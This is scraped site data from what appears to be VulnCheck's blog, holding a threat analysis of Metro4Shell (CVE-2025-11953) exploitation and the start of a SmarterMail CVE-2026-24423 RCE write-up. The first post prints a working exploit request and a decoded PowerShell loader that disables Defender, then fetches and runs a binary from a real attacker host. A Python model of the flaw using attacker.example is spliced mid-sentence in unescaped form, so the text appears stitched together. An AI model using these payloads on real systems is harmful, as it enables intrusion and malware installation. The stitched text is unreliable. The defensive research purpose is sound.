Wild","SecurityWeek","https:\u002F\u002Fwww.securityweek.com\u002Fcritical-react-native-vulnerability-exploited-in-the-wild\u002F",{"title":14381,"source":14382,"link":14383,"date":14375},"Hackers Exploit Metro4Shell RCE Flaw in React Native CLI npm Package","The Hacker News","https:\u002F\u002Fthehackernews.com\u002F2026\u002F02\u002Fhackers-exploit-metro4shell-rce-flaw-in.html",{"title":14385,"source":14386,"link":14387,"date":14375},"Hackers Exploiting React Native’s Metro Server in the Wild to Attack Developers","Cyber Security News","https:\u002F\u002Fcybersecuritynews.com\u002Freact-native-metro-server-exploit\u002F",{"title":14389,"source":14390,"link":14391,"date":14375},"Hackers abused React Native CLI flaw to deploy Rust malware before public disclosure","Security 
Affairs","https:\u002F\u002Fsecurityaffairs.com\u002F187587\u002Fhacking\u002Fhackers-abused-react-native-cli-flaw-to-deploy-rust-malware-before-public-disclosure.html",{"title":14393,"source":3481,"link":14394,"date":14375},"Critical React Native Metro dev server bug under attack as researchers scream into the void","https:\u002F\u002Fwww.theregister.com\u002F2026\u002F02\u002F03\u002Fcritical_react_native_metro_server\u002F",{"title":14396,"source":12157,"link":14397,"date":14398},"Risky Bulletin: Plone CMS stops supply-chain attack","https:\u002F\u002Fnews.risky.biz\u002Frisky-bulletin-plone-cms-stops-supply-chain-attack\u002F","2026-02-04",{"title":14400,"source":12153,"link":14401,"date":14398},"Attacks involving critical React Native bug target Windows, Linux systems","https:\u002F\u002Fwww.scworld.com\u002Fbrief\u002Fattacks-involving-critical-react-native-bug-target-windows-linux-systems",{"title":14403,"source":10841,"link":14404,"date":14398},"React2Shell exploitation undergoes significant change in threat activity","https:\u002F\u002Fwww.cybersecuritydive.com\u002Fnews\u002Freact2shell-exploitation-threat-activity\u002F811359\u002F",{"title":14406,"source":14407,"link":14408,"date":14398},"Hackers Actively Exploit React Native Metro Server to Target Software Developers","GB Hackers","https:\u002F\u002Fgbhackers.com\u002Fhackers-actively-exploit-react-native-metro-server\u002F#google_vignette",{"title":14410,"source":14411,"link":14412,"date":14357},"React Native ‘Metro4Shell’ Exploited in the Wild, Putting Exposed Development Servers at Risk","The Cyber 
Syrup","https:\u002F\u002Fwww.thecybersyrup.com\u002Fp\u002Freact-native-metro4shell-exploited-in-the-wild-putting-exposed-development-servers-at-risk",[14414],{"name":10391,"avatar":10392,"link":10393,"linkName":10394},{"type":15,"value":14416,"toc":14757},[14417,14420,14426,14444,14468,14471,14477,14484,14495,14501,14504,14511,14517,14520,14541,14544,14550,14553,14568,14571,14577,14580,14583,14589,14592,14595,14598,14602,14609,14660,14666,14709,14711,14737],[263,14418],{":list":14419,"ico":266,"title":20},"[\"VulnCheck Canaries observed exploitation of CVE-2025-11953 in late December.\",\"Canary telemetry shows CVE-2025-11953 being used operationally, with consistent payload delivery across multiple dates rather than one-off probing or research activity.\",\"Exploitation delivered advanced payloads on Windows systems, demonstrating that Metro4Shell provides a practical initial access mechanism when exposed to the public internet.\"]",[18,14421,14422],{},[68,14423],{"alt":14424,"src":14425},"Metro Development Server Timeline","\u002Fblog\u002Fmetro4shell_eitw\u002Fcve-2025-11953-timeline.png",[18,14427,14428,14429,14434,14435,14439,14440,14443],{},"VulnCheck observed exploitation of ",[47,14430,14433],{"href":14431,"rel":14432},"https:\u002F\u002Fconsole.vulncheck.com\u002Fcve\u002FCVE-2025-11953",[51],"CVE-2025-11953"," on December 21, 2025, when our ",[47,14436,14438],{"href":920,"rel":14437},[51],"Canary"," network recorded exploitation of a Metro Development Server. The vulnerability, which we jokingly refer to as Metro4Shell, was automatically added to ",[47,14441,1233],{"href":10806,"rel":14442},[51]," the same day. 
Additional exploitation observed in January delivered the same payloads on January 4, 2026 and January 21, 2026, indicating continued operational use.",[18,14445,14446,14447,14452,14453,10515,14458,10515,14462,14467],{},"Now, more than a month after initial exploitation in the wild, that activity has yet to see broad public acknowledgment, and EPSS continues to assign a low exploitation probability of ",[47,14448,14451],{"href":14449,"rel":14450},"https:\u002F\u002Fapi.first.org\u002Fdata\u002Fv1\u002Fepss?cve=CVE-2025-11953&date=2026-01-28",[51],"0.00405",". This gap between observed exploitation and wider recognition matters, particularly for vulnerabilities that are easy to exploit and, as internet-wide ",[47,14454,14457],{"href":14455,"rel":14456},"https:\u002F\u002Fplatform.censys.io\u002Fsearch?q=host.services.endpoints.http.html_title%3D%22React+Native%22+and+host.services.port%3D%228081%22%20",[51],"search",[47,14459,9156],{"href":14460,"rel":14461},"https:\u002F\u002Fen.fofa.info\u002Fresult?qbase64=dGl0bGU9IlJlYWN0IE5hdGl2ZSIgJiYgcG9ydD04MDgx",[51],[47,14463,14466],{"href":14464,"rel":14465},"https:\u002F\u002Fwww.zoomeye.ai\u002FsearchResult?q=KHRpdGxlPSJSZWFjdCBOYXRpdmUiICYmIHBvcnQ9IjgwODEiKQ%3D%3D",[51],"shows",", exposed on the public internet.",[18,14469,14470],{},"VulnCheck customers had visibility into exploitation of this vulnerability in November through exploits and Suricata rules developed by the VulnCheck Initial Access Intelligence team. That early visibility ultimately informed and powered the detection logic deployed across the VulnCheck Canary network.",[993,14472,14474],{"id":14473},"all-aboard-the-metro-server",[295,14475,14476],{},"All Aboard the Metro Server",[18,14478,14479,14480,14483],{},"Metro is the JavaScript bundler and development server used by React Native applications during development and testing. 
Under default conditions, Metro can bind to external interfaces and expose an ",[886,14481,14482],{},"\u002Fopen-url"," endpoint. On Windows, the endpoint allows unauthenticated and remote attackers to execute arbitrary OS commands via a simple POST request.",[18,14485,14486,14487,14491,14492,59],{},"The vulnerability was found by JFrog researchers who published a root cause analysis on their ",[47,14488,11046],{"href":14489,"rel":14490},"https:\u002F\u002Fjfrog.com\u002Fblog\u002Fcve-2025-11953-critical-react-native-community-cli-vulnerability\u002F",[51],". This was followed by multiple proof of concept exploits on ",[47,14493,2485],{"href":11516,"rel":14494},[51],[993,14496,14498],{"id":14497},"train-spotting",[295,14499,14500],{},"Train-Spotting",[18,14502,14503],{},"The exploitation observed by VulnCheck was neither experimental nor exploratory. The payloads delivered through the Canary network were consistent across multiple weeks of exploitation, indicating operational use rather than vulnerability probing or proof-of-concept testing.",[18,14505,14506,14507,14510],{},"The attackers employed a multi-stage PowerShell-based loader delivered through ",[886,14508,14509],{},"cmd.exe",". The initial PowerShell is base64 encoded. 
An example of the observed attack pattern follows:",[1354,14512,14515],{"className":14513,"code":14514,"language":1359},[1357],"POST \u002Fopen-url HTTP\u002F1.1\nHost: VC_REDACTED\nUser-Agent: curl\u002F7.85.0\nContent-type: application\u002Fjson\nContent-Length: 4632\nConnection: Close\n\n{\"url\":\"cmd \u002Fc powershell -EncodedCommand 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\"}\n",[886,14516,14514],{"__ignoreMap":219},[18,14518,14519],{},"When decoded, the PowerShell payload performs the following actions:",[1789,14521,14522,14525,14528,14535,14538],{},[25,14523,14524],{},"Adds Microsoft Defender exclusion paths for the current working directory and the system temporary directory",[25,14526,14527],{},"Establishes a raw TCP connection to an attacker-controlled host and port",[25,14529,14530,14531,14534],{},"Sends a ",[886,14532,14533],{},"GET \u002Fwindows"," request.",[25,14536,14537],{},"Writes the received data to a file in system's temporary directory",[25,14539,14540],{},"Executes the downloaded binary with a large argument string.",[18,14542,14543],{},"The decoded payload follows:",[1354,14545,14548],{"className":14546,"code":14547,"language":1359},[1357],"$currentDirectory = $(Get-Location).Path;\n$systemTempDirectory = [System.IO.Path]::GetTempPath();\n\nAdd-MpPreference -ExclusionPath $currentDirectory 2> $null;\nAdd-MpPreference -ExclusionPath $systemTempDirectory 2> $null;\n\n$tcpClient = New-Object System.Net.Sockets.TcpClient;\n$tcpClient.Connect(\"8.218.43.248\",60124);\n$tcpStream = $tcpClient.GetStream();\n$req = \"GET \u002Fwindows\";\n$reqb = [System.Text.Encoding]::UTF8.GetBytes($req);\n$tcpStream.Write($reqb,0,$reqb.Length);\n\n$execp = Join-Path -Path $systemTempDirectory -ChildPath jzDjiqKU.exe;\n$fileStream = [System.IO.File]::OpenWrite($execp);\n\n$buffer = New-Object byte[] 4096;\n$bytesRead = 0;\nwhile (($bytesRead = $tcpStream.Read($buffer, 0, $buffer.Length)) -gt 0) {\n    $fileStream.Write($buffer, 0, 
$bytesRead);\n}\n$fileStream.Close();\n$tcpStream.Close();\n$tcpClient.Close();\nStart-Process -FilePath \"$execp\" -ArgumentList '3qhAImaLj74zHdyyGDQFsNsfLLuFhWMhX7CrsblBI3mXjrknG9y8AzUWu9weM7qNi2YsX7mnqLJHJGaWj6ssH9qkBzcCpNgdM7mLn2EkQLypv7xGOmWRj6UsGNqkBzMHsNsfLLuJhW86Q7mnsbxCOmWRhLErH9y4AiAEuN8BJbOSlGEnX7mmp7JHJGaXjKssH9ukBzIYu9seM7qKnG0iQL2mv7BFOmSTkrovH8O+BToAv9kePbiKi2YnRqauq7lfJmaXhr0lHtuqADAYu9ofM7mJlnkjRrKpr7lDJHeRi6UvHNqkBzQGpNwdJ72MlGMhUbmurKZAJGKLjbsoAdy9DzoPuNQWPbqNl3klQ7yxrLtfLGCfirssG9qqDi4Eu9UBL7iIi2IkS76vrrtBNGWUjqUkHcO7BjEYstoVK7uNlW80Q7qtsblALHmUjbkzHtqyDDgBvNwPL7mPi2E6Q7ymsblFJW2TibooD9+4BC4OssMeK7iSlG4sS76vrrpBNG+Ljb8tAd+6BC4AvtcZLLmPhWMjX7qrraZAJG+Li7onGd27BjcWvtoBL7+Pi2YjRqaurLlLImeUjL49HtmkBzAFpNwZKKWNlmAuRriqrahJOmWUi6UsFtWkBDECsNsfLLqNhW86Q7mnsbpDIXmRjrErH9y6ByACvcMdKbmSkG86SbylqbhAJG6FiLwzHdm5GDEEvcMeKbuGk2clRbu\u002FrrhGOmaSiKUoHcO4AToAutwbK6uNlGY6QLmxrrBfJW+Shr0tHt65FjQBpN8cJaWOl2M6QrmlqbhAJ26iK0gDBMpHeowJO0qc\u002FqrA1iaR8ftvUxc5oz2GnQ=='\n",[886,14549,14547],{"__ignoreMap":219},[18,14551,14552],{},"This same methodology was observed across multiple attacks. 
The deliberate disabling of Microsoft Defender protections before payload retrieval indicates the attacker anticipated the presence of endpoint security controls and incorporated evasion measures into the initial execution flow.",[18,14554,14555,14556,14561,14562,14567],{},"The downloaded binary is UPX-packed (SHA-256: ",[47,14557,14560],{"href":14558,"rel":14559},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002Fd8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6",[51],"d8337df3aff749250557bf11daf069eb404cce0e6f4f91c6bd6d3f78aed6e9d6","), but once unpacked (SHA-256: ",[47,14563,14566],{"href":14564,"rel":14565},"https:\u002F\u002Fwww.virustotal.com\u002Fgui\u002Ffile\u002F7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886",[51],"7ecbb0cc88dfa5f187c209a28bd25e8e2d5113bb898a91ae273bca5983130886","), the payload is revealed to be a Rust-based binary that incorporates basic anti-analysis logic, including runtime checks intended to hinder static inspection.",[18,14569,14570],{},"VulnCheck observed attacks originating from 65.109.182.231, 223.6.249.141, and 134.209.69.155, with the \"windows\" payload hosted at 8.218.43.248:60124 and 47.86.33.195:60130. The same infrastructure also hosted a corresponding binary named \"linux\".",[993,14572,14574],{"id":14573},"why-early-exploitation-matters",[295,14575,14576],{},"Why Early Exploitation Matters",[18,14578,14579],{},"The most important aspect of this activity is not the payloads or the infrastructure involved, but the timeline. VulnCheck observed exploitation attempts in December. As of late January, public discussion largely frames CVE-2025-11953 as a theoretical risk rather than an active intrusion vector. This disconnect is where defenders are most likely to be caught unprepared.",[18,14581,14582],{},"Attackers do not wait for KEV listings, vendor summaries, or consensus narratives. Once proof-of-concept code exists and scanning is viable, exploitation follows quickly. 
Developer tooling is particularly attractive because it is widespread, inconsistently monitored, and rarely treated as a production-grade attack surface.",[993,14584,14586],{"id":14585},"closing",[295,14587,14588],{},"Closing",[18,14590,14591],{},"CVE-2025-11953 is not remarkable because it exists. It is remarkable because it reinforces a pattern defenders continue to relearn. Development infrastructure becomes production infrastructure the moment it is reachable, regardless of intent.",[18,14593,14594],{},"Organizations cannot afford to wait for CISA KEV inclusion, vendor reports, or broad consensus before taking action. Exploitation often begins as soon as exposure exists. Identifying those gaps early is critical to reducing attacker dwell time and preventing opportunistic compromise.",[18,14596,14597],{},"This is exactly the class of activity VulnCheck Canaries are designed to surface, and why VulnCheck KEV tracks real-world exploitation as it happens instead of after narratives solidify. 
It is a prerequisite for defending modern infrastructure.",[993,14599,14600],{"id":10611},[295,14601,10612],{},[14603,14604,14606],"h4",{"id":14605},"network-infrastructure",[295,14607,14608],{},"Network Infrastructure",[307,14610,14611,14620],{},[310,14612,14613],{},[313,14614,14615,14617],{},[316,14616,2126],{},[316,14618,14619],{},"Observed Role",[336,14621,14622,14630,14637,14644,14652],{},[313,14623,14624,14627],{},[341,14625,14626],{},"65.109.182.231",[341,14628,14629],{},"Exploitation source",[313,14631,14632,14635],{},[341,14633,14634],{},"223.6.249.141",[341,14636,14629],{},[313,14638,14639,14642],{},[341,14640,14641],{},"134.209.69.155",[341,14643,14629],{},[313,14645,14646,14649],{},[341,14647,14648],{},"8.218.43.248",[341,14650,14651],{},"Payload host (Windows)",[313,14653,14654,14657],{},[341,14655,14656],{},"47.86.33.195",[341,14658,14659],{},"Payload host (Windows and Linux)",[14603,14661,14663],{"id":14662},"file-hashes",[295,14664,14665],{},"File Hashes",[307,14667,14668,14677],{},[310,14669,14670],{},[313,14671,14672,14675],{},[316,14673,14674],{},"SHA-256 Hash",[316,14676,10625],{},[336,14678,14679,14686,14693,14701],{},[313,14680,14681,14683],{},[341,14682,14560],{},[341,14684,14685],{},"UPX-packed Windows payload",[313,14687,14688,14690],{},[341,14689,14566],{},[341,14691,14692],{},"Unpacked Windows payload",[313,14694,14695,14698],{},[341,14696,14697],{},"d1886b189474b02467ed2845df0938cec9785e99c3d4b04e0b7de3cafbee4182",[341,14699,14700],{},"UPX-packed Linux payload",[313,14702,14703,14706],{},[341,14704,14705],{},"6686d4baa9d483da27ba84dab85e96e42b790b608571de7bcb07a1fd7c975fe3",[341,14707,14708],{},"Unpacked Linux 
payload",[61,14710,202],{"id":201},[18,14712,10768,14713,1246,14716,10775,14719,10779,14722,1246,14727,1246,14732,59],{},[47,14714,283],{"href":281,"rel":14715},[51],[47,14717,216],{"href":1258,"rel":14718},[51],[47,14720,1251],{"href":1249,"rel":14721},[51],[47,14723,14725],{"href":10782,"rel":14724},[51],[1131,14726,10786],{},[47,14728,14730],{"href":10789,"rel":14729},[51],[1131,14731,10793],{},[47,14733,10798,14735],{"href":10796,"rel":14734},[51],[1131,14736,10801],{},[18,14738,1228,14739,1234,14742,1240,14745,1246,14748,1246,14751,1255,14754,1260],{},[47,14740,1233],{"href":10806,"rel":14741},[51],[47,14743,1239],{"href":1237,"rel":14744},[51],[47,14746,1245],{"href":1243,"rel":14747},[51],[47,14749,1251],{"href":1249,"rel":14750},[51],[47,14752,283],{"href":281,"rel":14753},[51],[47,14755,216],{"href":1258,"rel":14756},[51],{"title":219,"searchDepth":220,"depth":220,"links":14758},[14759,14760,14761,14762,14763,14764],{"id":14473,"depth":1266,"text":14476},{"id":14497,"depth":1266,"text":14500},{"id":14573,"depth":1266,"text":14576},{"id":14585,"depth":1266,"text":14588},{"id":10611,"depth":1266,"text":10612},{"id":201,"depth":220,"text":202},"VulnCheck observed in-the-wild exploitation of CVE-2025-11953 targeting exposed React Native Metro servers shortly after public disclosure. Analysis of repeated attacks shows consistent, operational payload delivery rather than opportunistic scanning. 
This post examines how the vulnerability was exploited and why early exploitation visibility matters for defenders.",{"slug":14767},"metro4shell_eitw","\u002Fblog\u002Fmetro4shell_eitw",{"title":11601,"description":14765},"blog\u002Fmetro4shell_eitw",[242,1279,2941,1281],"Rj-NLcl6eP2RWLU42GiRxdlqjalsTk49MBxmRzNSfPM",{"id":14774,"title":10344,"articles":14775,"authors":14786,"body":14788,"date":19464,"description":19465,"extension":234,"image":7,"link":7,"meta":19466,"navigation":237,"path":19468,"seo":19469,"series":7,"stem":19470,"subtype":7,"tags":19471,"__hash__":19472},"blog\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423.md",[14776,14780,14783],{"title":14777,"source":14378,"link":14778,"date":14779},"Critical SmarterMail Vulnerability Exploited in Ransomware Attacks","https:\u002F\u002Fwww.securityweek.com\u002Fcritical-smartermail-vulnerability-exploited-in-ransomware-attacks\u002F","2026-02-06",{"title":14781,"source":14373,"link":14782,"date":14779},"CISA warns of SmarterMail RCE flaw used in ransomware attacks","https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fcisa-warns-of-smartermail-rce-flaw-used-in-ransomware-attacks\u002Famp\u002F",{"title":14784,"source":14390,"link":14785,"date":14779},"U.S. 
CISA adds SmarterTools SmarterMail and React Native Community CLI flaws to its Known Exploited Vulnerabilities catalog","https:\u002F\u002Fsecurityaffairs.com\u002F187675\u002Fsecurity\u002Fu-s-cisa-adds-smartertools-smartermail-and-react-native-community-cli-flaws-to-its-known-exploited-vulnerabilities-catalog.html",[14787],{"name":4410,"avatar":4411,"link":4412,"linkName":4413},{"type":15,"value":14789,"toc":19458},[14790,14804,14846,14863,14867,14874,14896,14899,14905,14914,14916,14925,15194,15208,15221,16257,16266,16687,16694,17582,17592,19017,19020,19254,19260,19388,19391,19397,19407,19410,19419,19421,19438,19455],[18,14791,14792,14793,14798,14799,14803],{},"VulnCheck’s security research team identified an unauthenticated remote code execution vulnerability in SmarterTools SmarterMail, which we disclosed to the software supplier in accordance with VulnCheck’s vulnerability disclosure ",[47,14794,14797],{"href":14795,"rel":14796},"https:\u002F\u002Fwww.vulncheck.com\u002Fvulnerability-disclosure-policy",[51],"policy",". 
The vulnerability, which VulnCheck has assigned ",[47,14800,674],{"href":14801,"rel":14802},"https:\u002F\u002Fwww.vulncheck.com\u002Fadvisories\u002Fsmartertools-smartermail-unauthenticated-rce-via-connecttohub-api",[51],", arises from the ability to execute arbitrary commands in the mounting logic and was discovered independently by at least four different researchers:",[22,14805,14806,14824,14836],{},[25,14807,14808,14813,14814,905,14819],{},[47,14809,14812],{"href":14810,"rel":14811},"https:\u002F\u002Fx.com\u002FSinSinology",[51],"Sina Kheirkhah"," & ",[47,14815,14818],{"href":14816,"rel":14817},"https:\u002F\u002Fx.com\u002FchudyPB",[51],"Piotr Bazydlo",[47,14820,14823],{"href":14821,"rel":14822},"https:\u002F\u002Flabs.watchtowr.com\u002F",[51],"watchTowr",[25,14825,14826,905,14831],{},[47,14827,14830],{"href":14828,"rel":14829},"https:\u002F\u002Fcode-white.com\u002Fcredits\u002Fmarkus-wulftange\u002F",[51],"Markus Wulftange",[47,14832,14835],{"href":14833,"rel":14834},"https:\u002F\u002Fcode-white.com\u002Fpublic-vulnerability-list\u002F#systemadminsettingscontrollerconnecttohub-missing-authentication-in-smartermail",[51],"CODE WHITE GmbH",[25,14837,14838,905,14842],{},[47,14839,4410],{"href":14840,"rel":14841},"https:\u002F\u002Finfosec.exchange\u002F@yeslikethefood",[51],[47,14843,2709],{"href":14844,"rel":14845},"https:\u002F\u002Fwww.vulncheck.com\u002F",[51],[18,14847,14848,14849,14854,14855,14859,14860,59],{},"CVE-2026-24423 allows unauthenticated RCE via the ConnectToHub API endpoint. The vendor notified VulnCheck that the issue was patched in a January 15, 2026 release of SmarterMail (Build 9511), whose ",[47,14850,14853],{"href":14851,"rel":14852},"https:\u002F\u002Fwww.smartertools.com\u002Fsmartermail\u002Frelease-notes\u002Fcurrent",[51],"release notes"," highlight the presence of a critical security issue. 
The vulnerability is also noted on CODE WHITE GmbH’s “",[47,14856,14858],{"href":14833,"rel":14857},[51],"Public Vulnerability List",".” VulnCheck’s advisory for CVE-2026-24423 is ",[47,14861,305],{"href":14801,"rel":14862},[51],[61,14864,14866],{"id":14865},"cve-2026-24423-smartermail-connecttohub-unauth-rce","CVE-2026-24423: SmarterMail ConnectToHub Unauth RCE",[18,14868,14869,14870,14873],{},"SmarterTools SmarterMail prior to version 100.0.9511 is vulnerable to unauthenticated remote code execution through the ConnectToHub API. The vulnerable API endpoint (",[886,14871,14872],{},"\u002Fapi\u002Fv1\u002Fsettings\u002Fsysadmin\u002Fconnect-to-hub",") does not require authentication and configures the server’s system mount path. The mount command is controlled by the remote hub server, and the mount helper on every supported platform runs the command it is given, so the remote side can make the node execute arbitrary commands.",[18,14875,2245,14876,14879,14880,14883,14884,14887,14888,14891,14892,14895],{},[886,14877,14878],{},"connect-to-hub"," endpoint takes a remote address in the ",[886,14881,14882],{},"hubAddress"," parameter and requests ",[886,14885,14886],{},"\u002Fweb\u002Fapi\u002Fnode-management\u002Fsetup-initial-connection"," (or, in older versions, ",[886,14889,14890],{},"\u002Fweb\u002Fapi\u002Fhub-connection\u002Fsetup-initial-connection",") on the attacker-controlled server. That server responds with a JSON object that includes the ",[886,14893,14894],{},"CommandMount"," parameter, which lets the adversary define arbitrary command-execution parameters; if the light parameter checks are satisfied, the command is executed on every platform.",[18,14897,14898],{},"Because it wouldn’t be VulnCheck research without shells, we’ll start with the RCE evidence before jumping into the analysis. 
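To make the trust failure in the connect-to-hub flow concrete, here is an added Python model of the handler's control flow. It is not SmarterTools' code and not a reproduction of the vendor's patch: the node POSTs to hubAddress plus /web/api/node-management/setup-initial-connection, deserialises the reply into the InitialConnectionResult shape the post lists (SharedSecret, ClusterId, TargetHubs, IsStandby, SystemMount with Enabled, ReadOnly, MountPath, CommandMount) and, unless IsStandby is set, hands SystemMount to the mount helper. Beside it is one hardening shape, an assumption rather than the fix shipped in Build 9511: authenticate the caller, pin hubAddress to an administrator-configured HTTPS allowlist, and never take the mount command from the remote side. The HTTP call is injected so the example runs offline; fake_attacker_hub and its reply are constructed, and mount_helper is a stand-in because this section does not show how MountConfiguration.Mount uses CommandMount on each platform.

```python
import json
from dataclasses import dataclass
from typing import Callable, Optional
from urllib.parse import urlsplit

# Path the node requests on hubAddress (current builds, per the post).
SETUP_PATH = "/web/api/node-management/setup-initial-connection"
PostFn = Callable[[str, str], str]  # (url, json_body) -> json_reply


@dataclass
class SystemMount:
    enabled: bool
    read_only: bool
    mount_path: str
    command_mount: str


@dataclass
class MountResult:
    success: bool
    executed: Optional[str]  # command the helper would run; None if none ran


class AuthError(Exception):
    pass


class UntrustedHub(Exception):
    pass


def parse_system_mount(reply: dict) -> Optional[SystemMount]:
    """Map InitialConnectionResult.SystemMount (field names from the post)
    to a dataclass; a missing or malformed object yields None."""
    sm = reply.get("SystemMount")
    if not isinstance(sm, dict):
        return None
    try:
        return SystemMount(bool(sm["Enabled"]), bool(sm["ReadOnly"]),
                           str(sm["MountPath"]), str(sm["CommandMount"]))
    except KeyError:
        return None


def mount_helper(sm: Optional[SystemMount]) -> MountResult:
    """Stand-in for MountConfiguration.Mount(): the real helper is not shown
    in this section; this model runs CommandMount whenever Enabled is set."""
    if sm is None:
        return MountResult(False, None)
    if not sm.enabled:
        return MountResult(True, None)
    return MountResult(True, sm.command_mount)


def node_request(hub_address: str) -> str:
    # Body the node POSTs, mirroring the anonymous type in the handler.
    return json.dumps({"hubAddress": hub_address,
                       "oneTimePassword": "otp-placeholder",
                       "nodeName": "node1"})


def connect_to_hub_vulnerable(hub_address: str, post: PostFn) -> MountResult:
    """Pre-9511 flow: no caller authentication, hubAddress used verbatim,
    and the remote reply decides what the mount helper executes."""
    url = hub_address.rstrip("/") + SETUP_PATH
    reply = json.loads(post(url, node_request(hub_address)))
    if not reply or reply.get("IsStandby"):
        return MountResult(True, None)
    return mount_helper(parse_system_mount(reply))


def connect_to_hub_hardened(hub_address: str, post: PostFn, *,
                            caller_is_sysadmin: bool, allowed_hubs: set[str],
                            local_mount: Optional[SystemMount]) -> MountResult:
    """One hardening shape (an assumption, not the vendor's patch): require a
    system administrator, pin the hub to an admin-configured HTTPS allowlist,
    and never execute a command supplied by the remote side."""
    if not caller_is_sysadmin:
        raise AuthError("connect-to-hub requires an authenticated sysadmin")
    parts = urlsplit(hub_address)
    if parts.scheme != "https" or parts.hostname not in allowed_hubs:
        raise UntrustedHub(f"{hub_address!r} is not an allowed hub")
    reply = json.loads(post(hub_address.rstrip("/") + SETUP_PATH,
                            node_request(hub_address)))
    if not reply or reply.get("IsStandby"):
        return MountResult(True, None)
    remote = parse_system_mount(reply)
    if remote is None or not remote.enabled:
        return MountResult(True, None)
    # The hub may ask for a system mount; path and command come only from
    # local, administrator-controlled configuration.
    return mount_helper(local_mount)


# Constructed reply from an attacker-controlled hubAddress, in the shape
# the handler deserialises. The command is a harmless marker.
ATTACKER_REPLY = json.dumps({
    "SharedSecret": "attacker-chosen", "IsStandby": False,
    "ClusterId": "00000000-0000-0000-0000-000000000000", "TargetHubs": None,
    "SystemMount": {"Enabled": True, "ReadOnly": False, "MountPath": "/mnt/hub",
                    "CommandMount": "touch /tmp/hub-controlled"},
})
REQUESTED_URLS: list[str] = []


def fake_attacker_hub(url: str, body: str) -> str:
    """Offline stand-in for the attacker's server; records what was asked."""
    REQUESTED_URLS.append(url)
    return ATTACKER_REPLY


if __name__ == "__main__":
    print(connect_to_hub_vulnerable("http://attacker.example/", fake_attacker_hub))
```

In the vulnerable path an anonymous caller who supplies an attacker-owned hubAddress ends up with the attacker's CommandMount handed to the mount helper; in the hardened path the same request fails at authentication, then at the allowlist, and even a legitimate hub can only trigger the locally configured mount.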
The below figure shows execution on the Windows install of SmarterMail:",[18,14900,14901],{},[68,14902],{"alt":14903,"src":14904},"SmarterMail ConnectToHub RCE PoC for Windows","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423\u002Fsmartermail-rce-windows.png",[18,14906,14907,14908,14910],{},"And the below figure shows execution on the Docker container image provided by SmarterMail:",[1823,14909],{},[68,14911],{"alt":14912,"src":14913},"SmarterMail ConnectToHub RCE PoC for Linux","\u002Fblog\u002Fsmartermail-connecttohub-rce-cve-2026-24423\u002Fsmartermail-rce-linux.png",[993,14915,4541],{"id":4540},[18,14917,2245,14918,14920,14921,14924],{},[886,14919,14878],{}," API endpoint defined in the ",[886,14922,14923],{},"MailService.dll"," explicitly allows anonymous users and processes JSON data sent in POST requests:",[1354,14926,14930],{"className":14927,"code":14928,"language":14929,"meta":219,"style":219},"language-csharp shiki shiki-themes material-theme-lighter github-light github-dark monokai","[ShortDescription(\"Attempts to connect this node to a hub\")]\n[Description(\"Attempts to connect this node to a hub.\")]\n[AuthenticatedService(AllowAnonymous = true)]\n[HttpPost]\n[Route(\"connect-to-hub\")]\npublic async Task\u003CActionResult\u003CConnectToHubResult>> ConnectToHub([FromBody] ConnectToHubInput input)\n{\n    AdministrativeLog.Log(\"Connecting to hub\", LogLevels.Normal, base.HttpContext);\n    ConnectToHubResult connectToHubResult = await SystemSettingsService.ConnectToHub(input);\n    ConnectToHubResult connectToHubResult2 = connectToHubResult;\n    connectToHubResult2.machineName = HAClusterConfig.Instance.LocalName;\n    return 
base.CreateResponseMessage(connectToHubResult2);\n}\n","csharp",[886,14931,14932,14952,14969,14989,14998,15015,15059,15063,15104,15132,15145,15172,15190],{"__ignoreMap":219},[1373,14933,14934,14936,14940,14942,14944,14947,14949],{"class":1375,"line":1376},[1373,14935,7035],{"class":1383},[1373,14937,14939],{"class":14938},"sKvfc","ShortDescription",[1373,14941,1384],{"class":1383},[1373,14943,183],{"class":1387},[1373,14945,14946],{"class":1391},"Attempts to connect this node to a hub",[1373,14948,183],{"class":1387},[1373,14950,14951],{"class":1383},")]\n",[1373,14953,14954,14956,14958,14960,14962,14965,14967],{"class":1375,"line":220},[1373,14955,7035],{"class":1383},[1373,14957,10625],{"class":14938},[1373,14959,1384],{"class":1383},[1373,14961,183],{"class":1387},[1373,14963,14964],{"class":1391},"Attempts to connect this node to a hub.",[1373,14966,183],{"class":1387},[1373,14968,14951],{"class":1383},[1373,14970,14971,14973,14976,14978,14981,14983,14987],{"class":1375,"line":1266},[1373,14972,7035],{"class":1383},[1373,14974,14975],{"class":14938},"AuthenticatedService",[1373,14977,1384],{"class":1383},[1373,14979,14980],{"class":9372},"AllowAnonymous",[1373,14982,8575],{"class":1397},[1373,14984,14986],{"class":14985},"s8HiA"," true",[1373,14988,14951],{"class":1383},[1373,14990,14991,14993,14996],{"class":1375,"line":1852},[1373,14992,7035],{"class":1383},[1373,14994,14995],{"class":14938},"HttpPost",[1373,14997,7103],{"class":1383},[1373,14999,15000,15002,15005,15007,15009,15011,15013],{"class":1375,"line":4692},[1373,15001,7035],{"class":1383},[1373,15003,15004],{"class":14938},"Route",[1373,15006,1384],{"class":1383},[1373,15008,183],{"class":1387},[1373,15010,14878],{"class":1391},[1373,15012,183],{"class":1387},[1373,15014,14951],{"class":1383},[1373,15016,15017,15020,15023,15026,15028,15031,15033,15036,15039,15042,15045,15048,15051,15054,15057],{"class":1375,"line":4724},[1373,15018,15019],{"class":4652},"public",[1373,15021,15022],{"class":4652}," 
